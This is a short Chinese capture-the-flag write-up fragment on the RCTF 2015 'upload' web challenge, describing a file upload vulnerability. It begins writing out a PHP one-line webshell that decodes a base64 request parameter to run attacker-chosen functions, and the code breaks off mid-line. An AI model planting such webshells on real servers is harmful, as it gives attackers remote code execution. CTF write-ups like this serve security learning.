XCTF - web - wp1 (不按期整理)

upload ( RCTF - 2015 ) 一进入靶场有个登录注册(看上去像是二次注入,算辽先忍住骚操做,老老实实循序渐进) 因而获得下面的上传文件界面: 结合题目upload,天然按照文件上传漏洞往下作 这里用我最经常使用的php一句话进行挂小马尝试:php <?= $fun = base64_decode($_REQUEST['fun']); $arr = array($_POST['she
相关文章
相关标签/搜索